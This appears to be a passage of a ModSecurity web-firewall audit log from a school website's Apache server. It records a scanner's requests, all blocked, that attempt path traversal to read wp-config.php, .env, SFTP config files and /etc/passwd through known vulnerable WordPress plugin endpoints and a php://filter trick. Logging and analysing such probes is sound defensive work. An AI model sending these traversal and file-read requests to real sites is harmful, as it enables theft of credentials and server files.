(http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57afc463-Z-- --9bdb715f-A-- [23/Apr/2025:23:13:25 +0700] aAkRpTI97BrbgvDq16RsTgAAAM0 103.236.140.4 38162 103.236.140.4 8181 --9bdb715f-B-- GET /public/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9bdb715f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bdb715f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424805663565 804 (- - -) Stopwatch2: 1745424805663565 804; combined=303, p1=263, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bdb715f-Z-- --746dc911-A-- [23/Apr/2025:23:13:31 +0700] aAkRqxuwXEWV6ydgl52YFQAAAAA 103.236.140.4 38310 103.236.140.4 8181 --746dc911-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --746dc911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --746dc911-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811172276 748 (- - -) Stopwatch2: 1745424811172276 748; combined=272, p1=240, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --746dc911-Z-- --7e3bc871-A-- [23/Apr/2025:23:13:31 +0700] aAkRq9Iw_rqnm4P5_afOMwAAAFQ 103.236.140.4 38316 103.236.140.4 8181 --7e3bc871-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7e3bc871-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e3bc871-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811365703 869 (- - -) Stopwatch2: 1745424811365703 869; combined=290, p1=253, p2=0, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e3bc871-Z-- --47831a74-A-- [23/Apr/2025:23:13:31 +0700] aAkRqxuwXEWV6ydgl52YGAAAAAE 103.236.140.4 38322 103.236.140.4 8181 --47831a74-B-- GET /force-download.php?file=wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --47831a74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47831a74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811562729 745 (- - -) Stopwatch2: 1745424811562729 745; combined=232, p1=206, p2=0, p3=0, p4=0, p5=26, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47831a74-Z-- --1e246344-A-- [23/Apr/2025:23:13:31 +0700] aAkRqz1ahuoJLEjKiAU06gAAAIA 103.236.140.4 38328 103.236.140.4 8181 --1e246344-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1e246344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e246344-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811757016 791 (- - -) Stopwatch2: 1745424811757016 791; combined=338, p1=307, p2=0, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e246344-Z-- --1635d318-A-- [23/Apr/2025:23:13:31 +0700] aAkRqxuwXEWV6ydgl52YGwAAAAs 103.236.140.4 38334 103.236.140.4 8181 --1635d318-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1635d318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1635d318-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811950841 791 (- - -) Stopwatch2: 1745424811950841 791; combined=297, p1=268, p2=0, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1635d318-Z-- --dc22d062-A-- [23/Apr/2025:23:13:33 +0700] aAkRrRuwXEWV6ydgl52YKAAAAAg 103.236.140.4 38376 103.236.140.4 8181 --dc22d062-B-- GET /.vscode/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dc22d062-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc22d062-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424813927266 809 (- - -) Stopwatch2: 1745424813927266 809; combined=316, p1=257, p2=0, p3=0, p4=0, p5=59, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc22d062-Z-- --381c6e7e-A-- [23/Apr/2025:23:13:34 +0700] aAkRrjI97BrbgvDq16RsUQAAANg 103.236.140.4 38380 103.236.140.4 8181 --381c6e7e-B-- GET /resources/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --381c6e7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --381c6e7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424814121584 874 (- - -) Stopwatch2: 1745424814121584 874; combined=353, p1=316, p2=0, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --381c6e7e-Z-- --6bf96b3d-A-- [23/Apr/2025:23:13:34 +0700] aAkRrjI97BrbgvDq16RsUwAAAMc 103.236.140.4 38388 103.236.140.4 8181 --6bf96b3d-B-- GET /ftp.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6bf96b3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bf96b3d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424814517890 2204 (- - -) Stopwatch2: 1745424814517890 2204; combined=881, p1=420, p2=436, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bf96b3d-Z-- --b09fd64a-A-- [23/Apr/2025:23:13:36 +0700] aAkRsNIw_rqnm4P5_afONQAAAFY 103.236.140.4 38458 103.236.140.4 8181 --b09fd64a-B-- GET /ftp.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --b09fd64a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b09fd64a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424816684372 2462 (- - -) Stopwatch2: 1745424816684372 2462; combined=862, p1=423, p2=412, p3=0, p4=0, p5=27, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b09fd64a-Z-- --2136dc32-A-- [23/Apr/2025:23:13:37 +0700] aAkRsdIw_rqnm4P5_afONwAAAEg 103.236.140.4 38492 103.236.140.4 8181 --2136dc32-B-- GET /ftps.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2136dc32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2136dc32-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424817668376 2049 (- - -) Stopwatch2: 1745424817668376 2049; combined=691, p1=311, p2=358, p3=0, p4=0, p5=21, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2136dc32-Z-- --73f00b6b-A-- [23/Apr/2025:23:13:37 +0700] aAkRsT1ahuoJLEjKiAU07wAAAIU 103.236.140.4 38498 103.236.140.4 8181 --73f00b6b-B-- GET /ftp-config.conf HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --73f00b6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73f00b6b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424817867832 2186 (- - -) Stopwatch2: 1745424817867832 2186; combined=880, p1=441, p2=411, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73f00b6b-Z-- --3f4fa304-A-- [23/Apr/2025:23:13:38 +0700] aAkRstIw_rqnm4P5_afOOgAAAEs 103.236.140.4 38510 103.236.140.4 8181 --3f4fa304-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --3f4fa304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f4fa304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424818260104 906 (- - -) Stopwatch2: 1745424818260104 906; combined=404, p1=370, p2=0, p3=0, p4=0, p5=34, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f4fa304-Z-- --c4184b3a-A-- [23/Apr/2025:23:13:38 +0700] aAkRsj1ahuoJLEjKiAU08AAAAIo 103.236.140.4 38516 103.236.140.4 8181 --c4184b3a-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c4184b3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4184b3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424818456551 832 (- - -) Stopwatch2: 1745424818456551 832; combined=310, p1=266, p2=0, p3=0, p4=0, p5=44, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4184b3a-Z-- --7bcadc22-A-- [23/Apr/2025:23:13:47 +0700] aAkRuzI97BrbgvDq16RsfwAAAMA 103.236.140.4 38812 103.236.140.4 8181 --7bcadc22-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7bcadc22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bcadc22-E-- --7bcadc22-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424827925757 2166 (- - -) Stopwatch2: 1745424827925757 2166; combined=765, p1=525, p2=212, p3=0, p4=0, p5=28, sr=135, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bcadc22-Z-- --4012b259-A-- [23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RsgAAAANc 103.236.140.4 38814 103.236.140.4 8181 --4012b259-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4012b259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4012b259-E-- --4012b259-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828121832 1955 (- - -) Stopwatch2: 1745424828121832 1955; combined=570, p1=424, p2=118, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4012b259-Z-- --3972cf08-A-- [23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RsggAAANA 103.236.140.4 38820 103.236.140.4 8181 --3972cf08-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 